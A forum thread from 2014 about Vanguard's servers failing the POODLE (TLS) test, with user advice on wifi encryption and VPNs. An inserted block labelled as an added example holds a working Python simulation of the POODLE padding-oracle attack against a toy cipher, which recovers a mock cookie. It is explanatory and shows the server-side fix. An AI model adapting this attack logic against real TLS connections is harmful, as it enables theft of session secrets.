New HTTPS security bug, Vanguard servers vulnerable[Patched]

Topic Author
cb474
Posts: 812
Joined: Tue Jan 19, 2010 6:32 am

New HTTPS security bug, Vanguard servers vulnerable[Patched]

Post by cb474 » Tue Dec 09, 2014 2:38 am

There's a new version of the Poodle security bug that affects encrypted web browser connections to Vanguard's servers: http://arstechnica.com/security/2014/12 ... -websites/.

I tested Vanguard's servers using Qualys SSL Labs and Vanguard got an "F" for being vulnerable to this bug: https://www.ssllabs.com/ssltest/analyze ... 75.192.200. (This link just shows the report for one of Vanguard's IP addresses, but if you want to run the test yourself, you'll see that they all fail in the same way.) [Edit: Just checked the URL that you use to log onto your Vanguard account, investor.vanguard.com, and it fails the new TLS 1.2 bug in the same way: https://www.ssllabs.com/ssltest/analyze ... 75.202.116.]

The original Poodle bug affected the old SSLv3 mode of encrypted connections, which had a relatively easy fix for users, who could simply disable SSLv3 in their browser. The new bug affects TLS 1.2, however, which is pretty much the state of the art for HTTPS connections, so you can't just disable it, because then you couldn't make encrypted connections to servers at all. The only solution is for Vanguard to fix this at the server side.

I also noticed in the Qualys report that Vanguard's servers are still vulnerable to the original SSLv3 security bug, which is pretty astonishingly negligent. [Edit: However, the investor.vanguard.com URL through which you log on to your account is not vulnerable to the SSLv3 bug, only to the new TLS 1.2 variant of the bug.] There are also a host of less than stellar security protocols that show up in the report on Vanguard's servers.

As far as I understand, the only way you can be subject to this attack is through a man in the middle attack, when you're connected to a wifi hotspot or unsecured router. So never access your Vanguard account from a cafe or hotel or any public wifi (unless you're using a VPN) and make sure your home router uses WPA2 encryption (if you connect to your home router with WEP--as many people surprisingly still do--then there's a password to connect, but the connection itself is not encrypted and can be sniffed--and if you have no password on your home wifi, you're definitely not encrypted and vulnerable).

[Update, Thu Dec 11 19:11 PST 2014: As of this moment, only three of Vanguard's eight servers for logging into your account appear to have had the TLS 1.2 security bug fixed. So unless you know which server you're connected to, the risk remains.]

[Update, Fri Dec 12 02:02 PST 2014: All of Vanguard's servers at investor.vanguard.com appear to be updated now. Vanguard.com servers also look like they've been updated, including fixing the fact that they were still vulnerable to the original SSLv3 bug, which was just lame beyond measure.]
Last edited by cb474 on Sat Dec 13, 2014 5:54 am, edited 6 times in total.
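The attack behind the "POODLE (TLS)" line in the SSL Labs report, as an added worked example that is not part of the original post, of Vanguard's systems, or of the Qualys tool. It is a self-contained simulation: a toy 16-byte Feistel block cipher built from HMAC-SHA256 stands in for AES, records are MAC-then-pad-then-encrypt in CBC mode with TLS-style padding, and the keys, the secret and the message layout are constructed for the demonstration. The one thing it reproduces faithfully is the bug: a server that reads only the padding-length byte and never verifies the padding bytes themselves (`check_pad_bytes=False`) becomes a padding oracle, and a man in the middle who can make the browser resend a request with chosen prefix and suffix lengths (as injected JavaScript does in the real attack) and can rewrite ciphertext in flight recovers the secret one byte per ~256 requests. The same server with the padding bytes checked (`check_pad_bytes=True`) is the server-side fix the post says is the only real solution.

```python
# Added example (not from the original thread): simulation of the POODLE
# padding-oracle attack on CBC-mode records. A toy Feistel cipher replaces AES;
# keys, secret and message layout are constructed for the demonstration.
import hashlib
import hmac
import os

BLOCK = 16    # cipher block size in bytes
MAC_LEN = 16  # truncated HMAC-SHA256 tag appended to each record
ROUNDS = 4
KEYS = (b"enc-key-demo-16B", b"mac-key-demo-16B")  # constructed demo keys


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key, rnd, half):
    # Feistel round function: keyed PRF over one 8-byte half block
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in range(ROUNDS):
        l, r = r, _xor(l, _f(key, i, r))
    return l + r


def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in reversed(range(ROUNDS)):
        l, r = _xor(r, _f(key, i, l)), l
    return l + r


def cbc_encrypt(key, iv, data):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return iv + b"".join(out)


def cbc_decrypt(key, ct):
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return b"".join(_xor(block_decrypt(key, blocks[i]), blocks[i - 1])
                    for i in range(1, len(blocks)))


def seal(keys, data):
    """Client side: data || MAC || padding, CBC-encrypted under a fresh random IV."""
    enc_key, mac_key = keys
    body = data + hmac.new(mac_key, data, hashlib.sha256).digest()[:MAC_LEN]
    pad_len = BLOCK - 1 - (len(body) % BLOCK)
    body += bytes([pad_len]) * (pad_len + 1)  # TLS padding: every pad byte equals pad_len
    return cbc_encrypt(enc_key, os.urandom(BLOCK), body)


def open_record(keys, ct, check_pad_bytes):
    """Server side. check_pad_bytes=False is the POODLE bug: only the length byte is read."""
    enc_key, mac_key = keys
    pt = cbc_decrypt(enc_key, ct)
    pad_len = pt[-1]
    if pad_len >= BLOCK or pad_len + 1 + MAC_LEN > len(pt):
        return None
    if check_pad_bytes and any(b != pad_len for b in pt[-pad_len - 1:-1]):
        return None  # the fix: every padding byte must carry the declared value
    body = pt[:len(pt) - pad_len - 1]
    data, tag = body[:-MAC_LEN], body[-MAC_LEN:]
    expected = hmac.new(mac_key, data, hashlib.sha256).digest()[:MAC_LEN]
    return data if hmac.compare_digest(tag, expected) else None


def poodle_recover(keys, secret, check_pad_bytes, max_tries=5000):
    """Man in the middle: makes the victim resend prefix+secret+suffix with chosen
    lengths and rewrites the ciphertext. Returns (recovered_bytes, completed)."""
    recovered = bytearray()
    for j in range(len(secret)):
        prefix_len = (-(j + 1)) % BLOCK                 # secret[j] lands on the last byte of a block
        target = (prefix_len + j + 1) // BLOCK          # index of that block (the IV is block 0)
        suffix_len = (-(prefix_len + len(secret) + MAC_LEN)) % BLOCK  # final block is all padding
        for _ in range(max_tries):
            ct = seal(keys, b"A" * prefix_len + secret + b"B" * suffix_len)
            blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
            n = len(blocks) - 1
            forged = b"".join(blocks[:n]) + blocks[target]  # copy target block over the padding block
            if open_record(keys, forged, check_pad_bytes) is not None:
                # accepted only when D(C_target)[-1] ^ C_{n-1}[-1] == BLOCK-1, which leaks the byte
                recovered.append((BLOCK - 1) ^ blocks[n - 1][-1] ^ blocks[target - 1][-1])
                break
        else:
            return bytes(recovered), False             # server never accepted: no oracle
    return bytes(recovered), True


if __name__ == "__main__":
    print(poodle_recover(KEYS, b"cookie=s3cr3t", check_pad_bytes=False))      # lax server leaks it
    print(poodle_recover(KEYS, b"c", check_pad_bytes=True, max_tries=2000))  # strict server: (b'', False)
```

The acceptance test on the lax server is the whole oracle: it says yes only when the last byte of the transplanted block happens to decrypt to the padding-length value, and that single bit of feedback per request is enough. Note that the fix is not "turn off CBC" from the client side; it is the server validating every padding byte, which is what the SSL Labs re-test checks for.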

in_reality
Posts: 4529
Joined: Fri Jul 12, 2013 6:13 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by in_reality » Tue Dec 09, 2014 4:16 am

Schwab was reported as a "B" - not that I really know what that means...

Topic Author
cb474
Posts: 812
Joined: Tue Jan 19, 2010 6:32 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by cb474 » Tue Dec 09, 2014 4:25 am

in_reality wrote:Schwab was reported as a "B" - not that I really know what that means...
You can read the whole long report the site produces and see what it means. Then look up things you don't understand.

As far as this bug goes, you need to scroll down to near the bottom of the report and look for a line labeled "POODLE (TLS)" and it will tell you if the server is vulnerable to the Poodle attack over TLS connections (which is a version of how HTTPS connections work). For client.schwab.com, it looks like the server is not vulnerable to this bug.

in_reality
Posts: 4529
Joined: Fri Jul 12, 2013 6:13 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by in_reality » Tue Dec 09, 2014 4:34 am

cb474 wrote:
in_reality wrote:Schwab was reported as a "B" - not that I really know what that means...
You can read the whole long report the site produces and see what it means. Then look up things you don't understand.
OK I got it. I had assumed clicking on the address link would take me to the site but it goes to the report!

The guide wasn't clear ... https://www.ssllabs.com/downloads/SSL_S ... _Guide.pdf

Topic Author
cb474
Posts: 812
Joined: Tue Jan 19, 2010 6:32 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by cb474 » Tue Dec 09, 2014 4:46 am

in_reality wrote:OK I got it. I had assumed clicking on the address link would take me to the site but it goes to the report!

The guide wasn't clear ... https://www.ssllabs.com/downloads/SSL_S ... _Guide.pdf
Ah, yes, you have to click on the address link.

I understand many of the technical things in the Qualys server tests, but I'm not an expert. I think you would just have to do online searches on the different sections and lines in the report to figure out what they're about.

A lot of it is about the different algorithms and encryption keys used by the server to create encrypted connections (e.g. are they using the strongest methods? weaker ones?). And a lot of the report is noting areas where servers will use stronger encryption methods, but also permit weaker methods for people connecting from old browsers and operating systems.

It is often considered better to simply not permit these connections at all, which would break the website for people with out-of-date software (which obviously from one perspective doesn't make a good impression on clients, who are not going to understand why things are failing), but which is more secure. In the end, this is mainly how the original Poodle bug affecting SSLv3 was dealt with. Administrators decided enough is enough, this is super old technology, we're shutting it down.

And then some of the report is about whether the server is vulnerable to specific known bugs, like this new TLS 1.2 variant of the Poodle bug, the original SSLv3 Poodle bug, the famous Heartbleed bug, and so on.

nisiprius
Advisory Board
Posts: 39750
Joined: Thu Jul 26, 2007 9:33 am
Location: The terrestrial, globular, planetary hunk of matter, flattened at the poles, is my abode.--O. Henry

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by nisiprius » Tue Dec 09, 2014 8:15 am

cb474 wrote:...if you connect to your home router with WEP--as many people surprisingly still do...
You mean it wasn't "wired equivalent" after all? :shock:
Annual income twenty pounds, annual expenditure nineteen nineteen and six, result happiness; Annual income twenty pounds, annual expenditure twenty pounds ought and six, result misery.

telemark
Posts: 2571
Joined: Sat Aug 11, 2012 6:35 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by telemark » Tue Dec 09, 2014 10:11 am

Not doing anything important over public wifi networks is a good idea in any case. Seriously, you don't know where those things have been.

Sidney
Posts: 6736
Joined: Thu Mar 08, 2007 6:06 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by Sidney » Tue Dec 09, 2014 11:22 am

telemark wrote:Not doing anything important over public wifi networks is a good idea in any case. Seriously, you don't know where those things have been.
What, you've never been enjoying a cool one and had the sudden urge to re-balance? :beer
I always wanted to be a procrastinator.

KyleAAA
Posts: 7751
Joined: Wed Jul 01, 2009 5:35 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by KyleAAA » Tue Dec 09, 2014 11:43 am

cb474 wrote:
As far as I understand, the only way you can be subject to this attack is through a man in the middle attack, when you're connected to a wifi hotspot or unsecured router. So never access your Vanguard account from a cafe or hotel or any public wifi (unless you're using a VPN) and make sure your home router uses WPA2 encryption (if you connect to your home router with WEP--as many people surprisingly still do--then there's a password to connect, but the connection itself is not encrypted and can be sniffed--and if you have no password on your home wifi, you're definitely not encrypted and vulnerable).
+100,000,000,000

Just this alone makes such a huge difference. It's safe to assume that if you're on public wifi or if your home wifi isn't encrypted, somebody almost certainly IS listening in.

Ninegrams
Posts: 557
Joined: Sun Aug 17, 2014 6:12 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by Ninegrams » Tue Dec 09, 2014 11:52 am

cb474 wrote:There's a new version of the Poodle security bug that affects encrypted web browser connections to Vanguard's servers: http://arstechnica.com/security/2014/12 ... -websites/.

I tested Vanguard's servers using Qualys SSL Labs and Vanguard got an "F" for being vulnerable to this bug: https://www.ssllabs.com/ssltest/analyze ... 75.192.200. (This link just shows the report for one of Vanguard's IP addresses, but if you want to run the test yourself, you'll see that they all fail in the same way.) [Edit: Just checked the URL that you use to log onto your Vanguard account, investor.vanguard.com, and it fails the new TLS 1.2 bug in the same way: https://www.ssllabs.com/ssltest/analyze ... 75.202.116.]

The original Poodle bug affected the old SSLv3 mode of encrypted connections, which had a relatively easy fix for users, who could simply disable SSLv3 in their browser. The new bug affects TLS 1.2, however, which is pretty much the state of the art for HTTPS connections, so you can't just disable it, because then you couldn't make encrypted connections to servers at all. The only solution is for Vanguard to fix this at the server side.

I also noticed in the Qualys report that Vanguard's servers are still vulnerable to the original SSLv3 security bug, which is pretty astonishingly negligent. [Edit: However, the investor.vanguard.com URL through which you log on to your account is not vulnerable to the SSLv3 bug, only to the new TLS 1.2 variant of the bug.] There are also a host of less than stellar security protocols that show up in the report on Vanguard's servers.

As far as I understand, the only way you can be subject to this attack is through a man in the middle attack, when you're connected to a wifi hotspot or unsecured router. So never access your Vanguard account from a cafe or hotel or any public wifi (unless you're using a VPN) and make sure your home router uses WPA2 encryption (if you connect to your home router with WEP--as many people surprisingly still do--then there's a password to connect, but the connection itself is not encrypted and can be sniffed--and if you have no password on your home wifi, you're definitely not encrypted and vulnerable).
Most home routers have at least one Ethernet port, so using that instead of wifi would be about as safe as you can get. I would bet most users are clueless about WEP, WPA2... and why shouldn't they be, the manufacturers putting out garbage routers with gaping security flaws aren't any better.

kenyan
Posts: 2986
Joined: Thu Jan 13, 2011 12:16 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by kenyan » Tue Dec 09, 2014 12:04 pm

I only do any financial transactions or logins from my Home or Work desktops. Home network does have Wifi, but not on the desktop. Wi-Fi is WPA2-encrypted, with a non-broadcasting SSID.

Interesting note - I recently signed up for the two-factor authentication offered by Vanguard, and have since been getting regular text messages due to overnight login attempts on both my and my wife's accounts. A bit unsettling, I must say. I will have to work on making our IDs a bit more cryptic (can't change them online, apparently).
Retirement investing is a marathon.

apados
Posts: 25
Joined: Thu Jul 04, 2013 1:10 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by apados » Tue Dec 09, 2014 12:27 pm

kenyan wrote:Interesting note - I recently signed up for the two-factor authentication offered by Vanguard, and have since been getting regular text messages due to overnight login attempts on both my and my wife's accounts. A bit unsettling, I must say. I will have to work on making our IDs a bit more cryptic (can't change them online, apparently).

If you use any aggregation sites it will attempt to login (e.g. mint.com etc.) and result in a text message requesting authentication.

floatingdoc
Posts: 147
Joined: Sun Jan 03, 2010 2:13 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by floatingdoc » Tue Dec 09, 2014 12:50 pm

Kenyan,

As it says on the site, make sure you are not using quicken or mint otherwise those services might be trying to access data and causing those texts

Ninegrams
Posts: 557
Joined: Sun Aug 17, 2014 6:12 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by Ninegrams » Tue Dec 09, 2014 7:50 pm

kenyan wrote:I only do any financial transactions or logins from my Home or Work desktops. Home network does have Wifi, but not on the desktop. Wi-Fi is WPA2-encrypted, with a non-broadcasting SSID.

Interesting note - I recently signed up for the two-factor authentication offered by Vanguard, and have since been getting regular text messages due to overnight login attempts on both my and my wife's accounts. A bit unsettling, I must say. I will have to work on making our IDs a bit more cryptic (can't change them online, apparently).

Hiding your SSID doesn't make you any safer:

http://www.howtogeek.com/howto/28653/de ... re-secure/

killjoy2012
Posts: 1094
Joined: Wed Sep 26, 2012 5:30 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by killjoy2012 » Tue Dec 09, 2014 9:31 pm

Funny how you guys either implicitly trust, or are overlooking, the insecurity or proper trust level of your ISP and every other router owner between your house and where Vanguard's servers are.

Ninegrams
Posts: 557
Joined: Sun Aug 17, 2014 6:12 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by Ninegrams » Tue Dec 09, 2014 11:42 pm

killjoy2012 wrote:Funny how you guys either implicitly trust, or are overlooking, the insecurity or proper trust level of your ISP and every other router owner between your house and where Vanguard's servers are.
Not sure what your point is. One can only control what one can control and unless you have a private and direct line to your financial institution( is it trustworthy??), how do you get around your packets going through ISP's and all the anonymous router hops in between? There is no good solution to this problem ( security arms race ) on the horizon. The internet was not designed with security as a top priority due to it's origins ( a relatively closed quasi government system ). If you want 100% ( or as close as you can get to that ) security don't use the internet.

patriciamgr2
Posts: 800
Joined: Mon Nov 19, 2007 3:06 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by patriciamgr2 » Wed Dec 10, 2014 12:09 am

To Kenyan & others reporting log-in attempts thwarted by 2FA:

would you please let us know if you're using an aggregation service (quicken, mint, etc). If not, we all need to be concerned. My userid is random letters & digits (which I do recall changing online but maybe they've changed that)--but that won't stop someone testing combinations (vanguard's aren't very long).

Any data would be helpful for the rest of us, Thanks.

Mudpuppy
Posts: 5890
Joined: Sat Aug 27, 2011 2:26 am
Location: Sunny California

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by Mudpuppy » Wed Dec 10, 2014 2:23 am

cb474 wrote:(if you connect to your home router with WEP--as many people surprisingly still do--then there's a password to connect, but the connection itself is not encrypted and can be sniffed--and if you have no password on your home wifi, you're definitely not encrypted and vulnerable).
Just an FYI, WEP does have encryption, it's just such a poor encryption scheme that it can be trivially broken by observing the encrypted traffic. After observing enough traffic, one can recover the key. Once the attacker has the key, everything can be decrypted. So it's the equivalent of an unencrypted link from a practical perspective, but I find it important to point out just how horrible the encryption scheme is, if only to hope that future developers remember this mistake (and similar mistakes with WPS) and don't make it again. Perhaps a vain hope, but a hope to have nonetheless.
killjoy2012 wrote:Funny how you guys either implicitly trust, or are overlooking, the insecurity or proper trust level of your ISP and every other router owner between your house and where Vanguard's servers are.
It's possible that routers on the IP subnet could be malicious, but that's the point of using strong encryption schemes: to make it difficult for those routers to be able to recover anything. At some point, you have to trust something or you can just go for the safest computer in the world: unplugged, turned off, and stored in the closet.

Topic Author
cb474
Posts: 812
Joined: Tue Jan 19, 2010 6:32 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by cb474 » Wed Dec 10, 2014 3:30 am

Mudpuppy wrote:Just an FYI, WEP does have encryption, it's just such a poor encryption scheme that it can be trivially broken by observing the encrypted traffic. After observing enough traffic, one can recover the key. Once the attacker has the key, everything can be decrypted. So it's the equivalent of an unencrypted link from a practical perspective, but I find it important to point out just how horrible the encryption scheme is, if only to hope that future developers remember this mistake (and similar mistakes with WPS) and don't make it again. Perhaps a vain hope, but a hope to have nonetheless.
Thanks for the clarification.

geekpryde
Posts: 92
Joined: Mon Jun 01, 2009 2:37 pm

Vanguard site Very Vulnerable to ‘Poodle’ Bug

Post by geekpryde » Thu Dec 11, 2014 1:53 pm

[Thread merged, see below. --admin LadyGeek]

I don't like seeing Vanguard in a negative light when I make my normal daily blog rounds, but it occasionally happens:
A cursory review using Qualys’s SSL/TLS scanning tool indicates that the Web sites for some of the world’s largest financial institutions are vulnerable to the new POODLE bug, including Bank of America, Chase.com, Citibank, HSBC, Suntrust — as well as retirement and investment giants Fidelity.com and Vanguard
Krebs on Security is a widely respected security blog written by Brian Krebs. I recommend the blog, and specifically this entry about banks and Vanguard.

From Krebs:

http://krebsonsecurity.com/2014/12/pood ... ank-sites/

https://www.ssllabs.com/ssltest/

killjoy2012
Posts: 1094
Joined: Wed Sep 26, 2012 5:30 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by killjoy2012 » Thu Dec 11, 2014 4:09 pm

Ninegrams wrote: Not sure what your point is.
My point was that this thread is overflowing with wifi security talk, when it's much more likely the bad guys would execute such an attack at an ISP or Internet core routing point. I highly doubt a Russian cyber crime perpetrator is going to fly to your house, sit in your bushes sniffing your somewhat insecure wifi while you sleep, then crack the WPA/WEP key and then POODLE you. It *may* be more plausible that they'd go after a hotel chain whose hotel Internet access is aggregated at a common proxy infrastructure - but again, not at the wifi AP level (too much work, not enough payback).

If you're that worried about the perceived insecurity of wifi, then use a private or public VPN service.

For Poodle, it would be much more effective for them to hack into a vulnerable or not properly secured ISP router, inject a new route to send Internet traffic through their router/proxy server, where they can then use multiple man in the middle attacks - including Poodle - at hundreds or thousands of people, with little-to-no cost.

TL;DR - The right answer is that Vanguard should update their website.

Ninegrams
Posts: 557
Joined: Sun Aug 17, 2014 6:12 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by Ninegrams » Thu Dec 11, 2014 7:54 pm

killjoy2012 wrote:
Ninegrams wrote: Not sure what your point is.
My point was that this thread is overflowing with wifi security talk, when it's much more likely the bad guys would execute such an attack at an ISP or Internet core routing point. I highly doubt a Russian cyber crime perpetrator is going to fly to your house, sit in your bushes sniffing your somewhat insecure wifi while you sleep, then crack the WPA/WEP key and then POODLE you. It *may* be more plausible that they'd go after a hotel chain whose hotel Internet access is aggregated at a common proxy infrastructure - but again, not at the wifi AP level (too much work, not enough payback).

If you're that worried about the perceived insecurity of wifi, then use a private or public VPN service.

For Poodle, it would be much more effective for them to hack into a vulnerable or not properly secured ISP router, inject a new route to send Internet traffic through their router/proxy server, where they can then use multiple man in the middle attacks - including Poodle - at hundreds or thousands of people, with little-to-no cost.

TL;DR - The right answer is that Vanguard should update their website.
And my point is you can only control those things you have the means to control. Even if we wanted to, you or I can't manage Vanguard's website or any of the other entities in between ourselves and Vanguard. We can ONLY manage our end of the chain. Now if you're saying that it's pointless to manage our end given the other risks, then you're of course fine to do that for yourself, others may feel differently. Your Russian hacker hypothetical is meaningless to this discussion about wifi, and you're ignoring the risk of a drive-by attack (which is a greater than zero risk). The other risks you mention may indeed be more likely, but short of not using the internet (or not using public Wi-fi for financial transactions) what can you do about them? Nothing. Personally I'm not worried about wi-fi security in the least because I don't use it for systems that I conduct financial transactions on.

One more reason to be as secure as possible with your personal end of the transaction is in the event your system/transaction is compromised, getting reimbursed by the financial entity in a timely fashion (if at all) is vastly more likely if you've done all you could to secure "your end".

Topic Author
cb474
Posts: 812
Joined: Tue Jan 19, 2010 6:32 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by cb474 » Thu Dec 11, 2014 9:58 pm

killjoy2012 wrote:
Ninegrams wrote: Not sure what your point is.
My point was that this thread is overflowing with wifi security talk, when it's much more likely the bad guys would execute such an attack at an ISP or Internet core routing point. I highly doubt a Russian cyber crime perpetrator is going to fly to your house, sit in your bushes sniffing your somewhat insecure wifi while you sleep, then crack the WPA/WEP key and then POODLE you. It *may* be more plausible that they'd go after a hotel chain whose hotel Internet access is aggregated at a common proxy infrastructure - but again, not at the wifi AP level (too much work, not enough payback).

If you're that worried about the perceived insecurity of wifi, then use a private or public VPN service.

For Poodle, it would be much more effective for them to hack into a vulnerable or not properly secured ISP router, inject a new route to send Internet traffic through their router/proxy server, where they can then use multiple man in the middle attacks - including Poodle - at hundreds or thousands of people, with little-to-no cost.

TL;DR - The right answer is that Vanguard should update their website.
Eavesdropping on public wifi is actually fairly common. Man in the middle attacks are not unheard of. What's more, many public wifi spots have their own man in the middle, as it were, monitoring and passing on traffic routed through them, for marketing, business purposes, etc. Since the IT people who set this stuff up often do a mediocre job with security, it is also possible to remotely exploit bugs in router firmware and take them over to remotely deploy man in the middle attacks (this is what happened with Home Depot, Target, having their point of sale devices hacked). So in fact, your proverbial Russian mobsters need not fly to America to exploit these bugs in public wifi and you are vastly underestimating the risk.

On top of that, there is a whole sub-culture of so called War Driving, wherein people drive around looking for wifi routers to sniff, break into, etc. So in fact, the risk to one's home router, while small, is real. And I'm sure if someone figured out a security bug in the firmware of popular routers issued by a common ISP, like Comcast, AT&T, etc., someone would be happy to write malicious code to crawl the web looking for these routers and exploiting the bug. You seem to think that some Russian mobsters would have to sit there individually targeting you. But that's not how it works. People create malware that propagates itself through the web searching for machines with known bugs, including devices like routers.

In any case, obviously the solution to this particular TLS 1.2 bug, as far as connecting to Vanguard's website goes, is for Vanguard to fix it on the server side. I said that in the OP, so I don't know why you feel you're making some point by repeating what is obvious and has already been said.

(By the way, at the time of this posting Vanguard appears to only have fixed the problem on three of their eight servers--so if you don't know which server you're connecting to, you could still be at risk.)

But there's nothing wrong with using the occasion to remind people of best practices, as far as their own computer security goes, in public and for their home routers. Since most people have very bad security practices, the point needs to be repeated a lot. Why you would be against educating people about computer security is beyond me.

Further, as Ninegrams notes, it is patently obvious that we as individuals have no control over the intra-network routers of our ISPs and the backbone of the internet. So you protect yourself where you can. You eliminate security risk as much as you can, but of course it's never perfect.

I also think that the routers in the backbone of our ISPs and the internet in general are in fact some of the few things that have a lot of security around them, managed by people who know what they're doing. The idea that Russian mobsters are going to compromise these devices is far more fantastic and science fiction, than the idea that your home router might get compromised. Indeed, one of the things we learned from the Snowden leaks is that the NSA has exploited some of these backbone resources to compromise things like the TOR anonymizing network, but only because they had the legal authority to acquire physical access to the routers and servers, which only the NSA could do. The security risks that only the NSA could pull off are really not the sort of problem most people need to worry about and far beyond what your proverbial Russian mobsters could do.

So I think you have misconstrued the risks entirely and the real benefits of people being more careful both about how they use public wifi and how they configure their home routers. These aren't trivial things and they are entirely a separate issue from Vanguard's server security or backbone internet structures, not in opposition to those security concerns.

ThankYouJack
Posts: 3088
Joined: Wed Oct 08, 2014 7:27 pm

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by ThankYouJack » Thu Dec 11, 2014 10:08 pm

cb474 wrote:
As far as I understand, the only way you can be subject to this attack is through a man in the middle attack, when you're connected to to a wifi hotspot or unsecured router. So never access your Vanguard account from a cafe or hotel or any public wifi (unless you're using a VPN) .
Even if you use a VPN that doesn't mean that data from your computer to vanguard.com will go through the VPN. It depends on the configuration of the VPN, right?

Topic Author
cb474
Posts: 812
Joined: Tue Jan 19, 2010 6:32 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by cb474 » Thu Dec 11, 2014 10:43 pm

ThankYouJack wrote:
cb474 wrote:
As far as I understand, the only way you can be subject to this attack is through a man in the middle attack, when you're connected to to a wifi hotspot or unsecured router. So never access your Vanguard account from a cafe or hotel or any public wifi (unless you're using a VPN) .
Even if you use a VPN that doesn't mean that data from your computer to vanguard.com will go through the VPN. It depends on the configuration of the VPN, right?
If you've configured the VPN correctly all data on your computer should go through an encrypted tunnel to the VPN, before heading to Vanguard's servers. So it's not that the veritable man in the middle would not see your traffic, it's just that it would be encrypted and unreadable for them.

(A proxy is different, though. A proxy is just a server that sits between you and whatever website or server you're connecting to. It masks your IP address from whoever you're connecting to, but does not necessarily encrypt your traffic to protect it between your computer and the proxy server--thereby securing it from routers, your ISP, and anything your traffic goes through before it reaches the proxy server. Usually a proxy connection is also set up within a particular program, like a web browser, not as a mechanism for routing all internet traffic from a device. So it's really mostly about masking your IP address and a minimal level of privacy and doesn't do much, if anything, for security.)

It is possible, of course, when connected to a VPN service, that the connection to the VPN server will drop for some reason (maybe the VPN disconnects you or has a glitch or whatever) and then your traffic will just start routing normally through whatever router and ISP you're connected to.

But a good VPN service will either have software that you run with the service that alerts you when the VPN connection has dropped or (better I think) instruct you how to set up firewall rules on your computer so that the computer itself will only route internet traffic through the VPN. That way, if the VPN connection drops, then you just lose internet service entirely. You could then manually reconfigure the firewall if you need to.

I would check with your VPN service, if you're using one, about how to be sure that your traffic is always going through them or that you're aware when the connection drops. If they can't help you with this or don't take it seriously enough, find another VPN service.

Also, you really want to use a VPN service that allows you to connect with the OpenVPN protocol. PPTP, which is a Microsoft technology, has known vulnerabilities and is complete garbage. L2TP/IPsec is supposed to be pretty good, but most security conscious people consider OpenVPN to be the best.

(From what I've read--and I researched this a lot--amongst hyper security and privacy conscious people two of the best options are PrivateInternetAccess and iVPN. PrivateInternetAccess has good prices and are very serious about their users' privacy; the principal administrators of the system relocated outside the U.S. so that they would not be subject to U.S. court orders--secret national security letters, etc.; but PrivateInternetAccess is still located in the U.S., so that has its pluses and minuses. iVPN is more expensive, but probably as good as it gets; they use two hop servers and are located and operated entirely outside the U.S.--though they have U.S. based servers, amongst other countries, depending on your needs; they are also associated with the Electronic Freedom Foundation, which I think is a very high mark of approval. Be wary, because most of the VPN services out there are relatively fly by night or don't really take your privacy that seriously. There have been some scandals.)
Last edited by cb474 on Thu Dec 11, 2014 11:10 pm, edited 2 times in total.

Mudpuppy
Posts: 5890
Joined: Sat Aug 27, 2011 2:26 am
Location: Sunny California

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by Mudpuppy » Thu Dec 11, 2014 10:58 pm

killjoy2012 wrote:My point was that this thread is overflowing with wifi security talk, when it's much more likely the bad guys would execute such an attack at an ISP or Internet core routing point. I highly doubt a Russian cyber crime perpetrator is going to fly to your house, sit in your bushes sniffing your somewhat insecure wifi while you sleep, then crack the WPA/WEP key and then POODLE you. It *may* be more plausible that they'd go after a hotel chain whose hotel Internet access is aggregated at a common proxy infrastructure - but again, not at the wifi AP level (too much work, not enough payback).

If you're that worried about the perceived insecurity of wifi, then use a private or public VPN service.

For Poodle, it would be much more effective for them to hack into a vulnerable or not properly secured ISP router, inject a new route to send Internet traffic through their router/proxy server, where they can then use multiple man in the middle attacks - including Poodle - at hundreds or thousands of people, with little-to-no cost.

TL;DR - The right answer is that Vanguard should update their website.
You underestimate the literal manpower the cyber criminal organizations have at their disposal. If they can manage to get a few hundred people to go act as cash mules when they skim some ATM numbers and PINs, then they can manage to get a few hundred people to go sit in high traffic areas in major metropolitan areas to snarf up whatever tasty morsels are floating by on WiFi. You just have to have them download a bootable USB or live CD and sit there, with little to no knowledge of how the attack actually works. They just have to be able to boot up off the USB/CD and click a few buttons to launch fully automated tools.

It is far more difficult and requires far more knowledge to hack into the core routers and the IP subnet. There are safeguards in place to prevent routing hijacking and that part of the infrastructure gets a little more attention than your average network. Yes, it would be a remote attack and it would have a bigger "return" on the virtual "investment", but why bother with robbing the bank, so to speak, when you can just have some mules siphon off bits and pieces here and there that collectively adds up to a tasty haul.

Topic Author
cb474
Posts: 812
Joined: Tue Jan 19, 2010 6:32 am

Re: New HTTPS security bug, Vanguard servers vulnerable

Post by cb474 » Thu Dec 11, 2014 11:21 pm

